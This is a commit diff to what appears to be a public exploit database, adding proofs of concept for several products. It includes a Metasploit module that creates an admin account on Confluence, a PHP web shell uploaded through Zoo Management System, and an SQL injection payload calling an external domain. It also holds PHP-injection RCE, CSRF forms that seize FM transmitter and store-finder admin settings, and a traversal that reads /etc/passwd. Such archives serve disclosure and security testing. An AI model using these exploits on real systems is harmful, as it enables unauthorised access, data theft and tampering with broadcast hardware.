DB: 2024-02-28

13 changes to exploits/shellcodes/ghdb TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution TEM Opera Plus FM Family Transmitter 35.45 - XSRF Executables Created with perl2exe < V30.10C - Arbitrary Code Execution Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit) Automatic-Systems SOC FL9600 FastLine - Directory Transversal Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin dawa-pharma 1.0-2022 - Multiple-SQLi Moodle 4.3 - Insecure Direct Object Reference Moodle 4.3 - Reflected XSS SuperStoreFinder - Multiple Vulnerabilities Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) Zoo Management System 1.0 - Unauthenticated RCE
2024-02-28 00:16:32 +00:00 · 2024-02-28 00:16:32 +00:00 · c1bcfc6347
commit c1bcfc6347
parent 9734fcef1e
13 changed files with 993 additions and 0 deletions
--- a/exploits/hardware/remote/51827.txt
+++ b/exploits/hardware/remote/51827.txt
@ -0,0 +1,67 @@
 TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution
 Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
 Product web page: https://www.tem-italy.it
 Affected version: Software version: 35.45
                  Webserver version: 1.7
 Summary: This new line of Opera plus FM Transmitters combines very
 high efficiency, high reliability and low energy consumption in compact
 solutions. They have innovative functions and features that can eliminate
 the costs required by additional equipment: automatic exchange of audio
 sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
 card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
 Webserver.
 Desc: The device allows access to an unprotected endpoint that allows
 MPFS File System binary image upload without authentication. The MPFS2
 file system module provides a light-weight read-only file system that
 can be stored in external EEPROM, external serial Flash, or internal
 Flash program memory. This file system serves as the basis for the
 HTTP2 web server module, but is also used by the SNMP module and is
 available to other applications that require basic read-only storage
 capabilities. This can be exploited to overwrite the flash program
 memory that holds the web server's main interfaces and execute arbitrary
 code.
 Tested on: Webserver
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2023-5799
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php
 18.08.2023
 --
 POST /mpfsupload HTTP/1.1
 Host: 192.168.1.2:8000
 Content-Length: 251
 Cache-Control: max-age=0
 Content-Type: multipart/form-data; boundary=----joxypoxy2
 User-Agent: MPFS2_PoC/2.0c
 Accept: */*
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Connection: close
 ------joxypoxy2
 Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
 Content-Type: application/octet-stream
 MPFS...<CGI BINARY PHONE HOME>
 -----joxypoxy2--
 HTTP/1.1 200 OK
 Connection: close
 Content-Type: text/html
 <html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>
--- a/exploits/hardware/remote/51828.txt
+++ b/exploits/hardware/remote/51828.txt
@ -0,0 +1,92 @@
 <!--
 TEM Opera Plus FM Family Transmitter 35.45 XSRF
 Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
 Product web page: https://www.tem-italy.it
 Affected version: Software version: 35.45
                  Webserver version: 1.7
 Summary: This new line of Opera plus FM Transmitters combines very
 high efficiency, high reliability and low energy consumption in compact
 solutions. They have innovative functions and features that can eliminate
 the costs required by additional equipment: automatic exchange of audio
 sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
 card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
 Webserver.
 Desc: The application interface allows users to perform certain actions
 via HTTP requests without performing any validity checks to verify the
 requests. This can be exploited to perform certain actions with administrative
 privileges if a logged-in user visits a malicious web site.
 Tested on: Webserver
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2023-5800
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php
 18.08.2023
 -->
 CSRF Change Forward Power:
 -------------------------
 <html>
  <body>
    <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
      <input type="hidden" name="Pwr" value="00100" />
      <input type="submit" value="Change" />
    </form>
  </body>
 </html>
 CSRF Change Frequency:
 ---------------------
 <html>
  <body>
    <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
      <input type="hidden" name="Freq" value="95&#46;5" />
      <input type="submit" value="Change" />
    </form>
  </body>
 </html>
 CSRF Change User/Pass/Priv Change Admin/User/Pass:
 -------------------------------------------------
 <html>
  <body>
    <form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
      <input type="hidden" name="usr0" value="admin" />
      <input type="hidden" name="psw0" value="admin" />
      <input type="hidden" name="usr1" value="operator1" />
      <input type="hidden" name="psw1" value="operator1" />
      <input type="hidden" name="lev1" value="1" />
      <input type="hidden" name="usr2" value="operator2" />
      <input type="hidden" name="psw2" value="operator2" />
      <input type="hidden" name="lev2" value="1" />
      <input type="hidden" name="usr3" value="consulter1" />
      <input type="hidden" name="psw3" value="consulter1" />
      <input type="hidden" name="lev3" value="2" />
      <input type="hidden" name="usr4" value="consulter2" />
      <input type="hidden" name="psw4" value="consulter2" />
      <input type="hidden" name="lev4" value="2" />
      <input type="hidden" name="usr5" value="consulter3" />
      <input type="hidden" name="psw5" value="consulter3" />
      <input type="hidden" name="lev5" value="2" />
      <input type="submit" value="Change" />
    </form>
  </body>
 </html>
--- a/exploits/multiple/remote/51825.txt
+++ b/exploits/multiple/remote/51825.txt
@ -0,0 +1,48 @@
 # Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution
 # Date: 10/17/2023
 # Exploit Author: decrazyo
 # Vendor Homepage: https://www.indigostar.com/
 # Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz
 # Version: <= V30.10C
 # Tested on: Ubuntu 22.04
 # Description:
 perl2exe packs perl scripts into native executables.
 Those executables use their 0th argument to locate a file to unpack and execute.
 Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument.
 That can be useful for breaking out of restricted shell environments.
 # Proof and Concept:
 user@testing:~/example$ ls
 p2x-30.10-Linux-x64-5.30.1.tar.gz  perl2exe-Linux-x64-5.30.1
 user@testing:~/example$
 user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.
 user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl
 user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl
 Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software
 ...
 Generating safe
 user@testing:~/example$
 user@testing:~/example$ # Check that the program executes as expected.
 user@testing:~/example$ ./safe
 I am completely safe
 user@testing:~/example$
 user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.
 user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl
 user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl
 Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software
 ...
 Generating malicious
 user@testing:~/example$
 user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.
 user@testing:~/example$ chmod -x malicious
 user@testing:~/example$ ./malicious
 -bash: ./malicious: Permission denied
 user@testing:~/example$
 user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.
 user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.
 user@testing:~/example$ bash -c 'exec -a malicious ./safe'
 j/k I am malicious AF
 $ pstree -s $$
 systemd───sshd───sshd───sshd───bash───safe───sh───pstree
 $
--- a/exploits/multiple/webapps/51829.rb
+++ b/exploits/multiple/webapps/51829.rb
@ -0,0 +1,138 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Auxiliary
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
        'Description' => %q{
          This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
          A specially crafted request can be create new admin account without authentication on the target Atlassian server.
        },
        'Author' => [
          'Unknown', # exploited in the wild
          'Emir Polat' # metasploit module
        ],
        'References' => [
          ['CVE', '2023-22515'],
          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
        ],
        'DisclosureDate' => '2023-10-04',
        'DefaultOptions' => {
          'RPORT' => 8090
        },
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
    ])
  end
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.action')
    )
    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Safe unless res.code == 200
    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
    return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/
    confluence_version = Rex::Version.new(Regexp.last_match(1))
    vprint_status("Detected Confluence version: #{confluence_version}")
    if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
    end
    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
  end
  def run
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
      'vars_get' => {
        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
      }
    )
    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200
    print_good('Found server-info.action! Trying to ignore setup.')
    created_user = create_admin_user
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      }
    )
    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user
    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200
    create_credential({
      workspace_id: myworkspace_id,
      origin_type: :service,
      module_fullname: fullname,
      username: datastore['NEW_USERNAME'],
      private_type: :password,
      private_data: datastore['NEW_PASSWORD'],
      service_name: 'Atlassian Confluence',
      address: datastore['RHOST'],
      port: datastore['RPORT'],
      protocol: 'tcp',
      status: Metasploit::Model::Login::Status::UNTRIED
    })
    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
    print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
  end
  def create_admin_user
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      },
      'vars_post' => {
        'username' => datastore['NEW_USERNAME'],
        'fullName' => 'New Admin',
        'email' => datastore['NEW_EMAIL'],
        'password' => datastore['NEW_PASSWORD'],
        'confirm' => datastore['NEW_PASSWORD'],
        'setup-next-button' => 'Next'
      }
    )
    res&.code == 302
  end
 end
--- a/exploits/php/webapps/51818.txt
+++ b/exploits/php/webapps/51818.txt
@ -0,0 +1,45 @@
 ## Title: dawa-pharma-1.0-2022 Multiple-SQLi
 ## Author: nu11secur1ty
 ## Date: 10/12/2023
 ## Vendor: https://www.mayurik.com/
 ## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download
 ## Reference: https://portswigger.net/web-security/sql-injection
 ## Description:
 The email parameter appears to be vulnerable to SQL injection attacks.
 The payload '+(select
 load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'
 was submitted in the email parameter. This payload injects a SQL
 sub-query that calls MySQL's load_file function with a UNC file path
 that references a URL on an external domain. The application
 interacted with that domain, indicating that the injected SQL query
 was executed. The attacker can get all the information for the clients
 of this application from the server, and very sensitive information
 for accessing the server by exploiting the vulnerability.
 [+]Payload:
 ```MySQL
 ---
 Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=mayuri.infospace@gmail.com'+(select
 load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''
 AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--
 VRdC&password=mayurik&login=
 ---
 ```
 ## Reproduce:
 https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 home page: https://www.nu11secur1ty.com/
--- a/exploits/php/webapps/51819.txt
+++ b/exploits/php/webapps/51819.txt
@ -0,0 +1,279 @@
 # Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
 # Date: 16.10.2023
 # Exploit Author: Çağatay Ceyhan
 # Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
 # Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
 # Version: 1.0
 # Tested on: Windows 11
 ## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
 POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
 Host: localhost
 Content-Length: 6162
 Cache-Control: max-age=0
 sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: "Windows"
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Connection: close
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="animal_id"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_given_name"
 kdkd
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_species_name"
 ıdsıd
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_dob"
 1552-02-05
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_gender"
 m
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_avg_lifespan"
 3
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="class_id"
 2
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="location_id"
 2
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_dietary_req"
 2
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_natural_habitat"
 faad
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_pop_dist"
 eterter
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_joindate"
 5559-02-06
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_height"
 2
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_weight"
 3
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_description"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="images[]"; filename="ultra.php"
 Content-Type: application/octet-stream
 <?php
 if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
 }
 ?>
 <!DOCTYPE html>
 <html lang="en">
 <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Web Shell</title>
    <style>
        * {
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }
        body {
            font-family: sans-serif;
            color: rgba(0, 0, 0, .75);
        }
        main {
            margin: auto;
            max-width: 850px;
        }
        pre,
        input,
        button {
            padding: 10px;
            border-radius: 5px;
            background-color: #efefef;
        }
        label {
            display: block;
        }
        input {
            width: 100%;
            background-color: #efefef;
            border: 2px solid transparent;
        }
        input:focus {
            outline: none;
            background: transparent;
            border: 2px solid #e6e6e6;
        }
        button {
            border: none;
            cursor: pointer;
            margin-left: 5px;
        }
        button:hover {
            background-color: #e6e6e6;
        }
        .form-group {
            display: -webkit-box;
            display: -ms-flexbox;
            display: flex;
            padding: 15px 0;
        }
    </style>
 </head>
 <body>
    <main>
        <h1>Web Shell</h1>
        <h2>Execute a command</h2>
        <form method="post">
            <label for="cmd"><strong>Command</strong></label>
            <div class="form-group">
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
                <button type="submit">Execute</button>
            </div>
        </form>
        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
            <h2>Output</h2>
            <?php if (isset($cmd)): ?>
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
            <?php else: ?>
                <pre><small>No result.</small></pre>
            <?php endif; ?>
        <?php endif; ?>
    </main>
 </body>
 </html>
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_med_record"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_transfer"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_transfer_reason"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_death_date"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_death_cause"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="an_incineration"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="m_gest_period"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="m_category"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="m_avg_body_temp"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="b_nest_const"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="b_clutch_size"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="b_wingspan"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="b_color_variant"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="f_body_temp"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="f_water_type"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="f_color_variant"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="rep_type"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="clutch_size"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="num_offspring"
 ------WebKitFormBoundary8NY8zT5dXIloiUML
 Content-Disposition: form-data; name="submit"
 ------WebKitFormBoundary8NY8zT5dXIloiUML--
 ## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
--- a/exploits/php/webapps/51820.txt
+++ b/exploits/php/webapps/51820.txt
@ -0,0 +1,29 @@
 # Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
 # Date: 20/10/2023
 # Exploit Author: tmrswrr
 # Vendor Homepage: https://moodle.org/
 # Software Demo: https://school.moodledemo.net/
 # Version: 4.3+
 # Tested on: Linux
 Vulnerability Details
 ======================
 Steps :
 1. Log in to the application with the given credentials > USER: teacher PASS: moodle
 2. In profile.php?id=11, modify the id Parameter to View User details,
 Email address, Country, City/town, City, Timezone
 3. Change the existing "id" value to another number
 https://school.moodledemo.net/user/profile.php?id=4
 https://school.moodledemo.net/user/profile.php?id=5
 https://school.moodledemo.net/user/profile.php?id=10
 https://school.moodledemo.net/user/profile.php?id=50
 https://school.moodledemo.net/blog/index.php?userid=3
 https://school.moodledemo.net/blog/index.php?userid=14
 https://school.moodledemo.net/mod/forum/user.php?id=53
 https://school.moodledemo.net/mod/forum/user.php?id=50
--- a/exploits/php/webapps/51821.txt
+++ b/exploits/php/webapps/51821.txt
@ -0,0 +1,19 @@
 # Exploit Title: Moodle 4.3 Reflected XSS
 # Date: 21/10/2023
 # Exploit Author: tmrswrr
 # Vendor Homepage: https://moodle.org/
 # Software Demo: https://school.moodledemo.net/
 # Version: 4.3
 # Tested on: Linux
 Vulnerability Details
 ======================
 Steps :
 1. Log in to the application with the given credentials > USER: teacher PASS: moodle
 2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=
 3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3
 4. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"
 5. You will be see alert button
--- a/exploits/php/webapps/51822.txt
+++ b/exploits/php/webapps/51822.txt
@ -0,0 +1,131 @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 .:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities
 .:. Google Dorks .:.
 "designed and built by Joe Iz."
 "Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
 inurl:/superstorefinder/index.php
 .:. Date: 0ctober 13, 2023
 .:. Exploit Author: bRpsd
 .:. Contact: cy[at]live.no
 .:. Vendor -> https://www.superstorefinder.net/
 .:. Product -> https://codecanyon.net/item/super-store-finder/3630922
 .:. Product Version -> [3.7 and below]
 .:. DBMS -> MySQL
 .:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 #############
 |DESCRIPTION|
 #############
 "Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"
 Vulnerability 1: Unauthenticated SQL Injection
 Types: boolean-based blind,error-based, time-based blind
 File: localhost/admin/index.php
 Vul Parameter: USERNAME [POST]
 ===========================================================================================
 Vulnerability 1: Unauthenticated SQL Injection
 Types: boolean-based blind,error-based, time-based blind
 File: localhost/admin/index.php
 Vul Parameter: USERNAME [POST]
 Test #1
 http://localhost:9000/adminstorefinder/admin/index.php
 username=a'&password=1&btn_login=Login
 Response Error:
 Array
 (
    [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
 )
 SELECT users.* FROM users WHERE users.username='admin''
 ===========================================================================================
 Test #2 => Payload (Proof Of Concept)
 http://localhost:9000/adminstorefinder/admin/index.php
 username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
 &password=1&btn_login=Login
 Response Error:
 Array
 (
    [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
 )
 ===========================================================================================
 ======================================================================================================================================================================================
 Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion
 File: localhost/admin/settings.php
 Vul Parameter: language_set [POST]
 Proof of concept:
 http://localhost:9000/superstorefinder/admin/settings.php
 langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1
 Index.php included in the config.inc.php , we just can go for rce
 with GET parameter ?cmd=
 http://localhost:9000/?cmd=uname -a
 Reponse:
 22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
 ===========================================================================================
 ===========================================================================================
 Vulnerability 3: Cross Site Request Forgery
 Risk: It can lead to Privilege Escalation through adding admins or changing admin password.
 Affected Files (1): localhost/superstorefinder/admin/users_add.php
 Parameters: username,password,cpassword
 Proof of concept:
 <iframe style="display:none" name="CSRF"></iframe>
    <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
      <input name="submit_hidden" value="submit_hidden" type="hidden" />
      <input type='hidden' name='username' value='X'>
         <input type='hidden' name='password' value='123'>
      <input type='hidden' name='cpassword' value='123'>
      <input type='hidden' value='submit'>
    </form>
    <script>document.getElementById("CSRF").submit()</script>
       <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
 Affected Files (2:):localhost/superstorefinder/admin/change_password.php
 Parameters: password,cpassword,save
 Proof of concept:
 <iframe style="display:none" name="CSRF"></iframe>
    <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
      <input type='hidden' name='password' value='123'>
         <input type='hidden' name='cpassword' value='123'>
      <input type='hidden' name="save=" value='save'>
    </form>
    <script>document.getElementById("CSRF").submit()</script>
       <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
    ======================================================================================
--- a/exploits/php/webapps/51823.txt
+++ b/exploits/php/webapps/51823.txt
@ -0,0 +1,11 @@
 # Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
 # Google Dork:
 # Date: 12/9/2023
 # Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
 # Vendor Homepage: http://automatic-systems.com
 # Software Link:
 # Version: V06
 # Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
 # CVE : CVE-2023-37607
 Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd
--- a/exploits/php/webapps/51824.txt
+++ b/exploits/php/webapps/51824.txt
@ -0,0 +1,16 @@
 # Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin
 # Google Dork:
 # Date: 12/9/2023
 # Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
 # Vendor Homepage: http://automatic-systems.com
 # Software Link:
 # Version: V06
 # Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
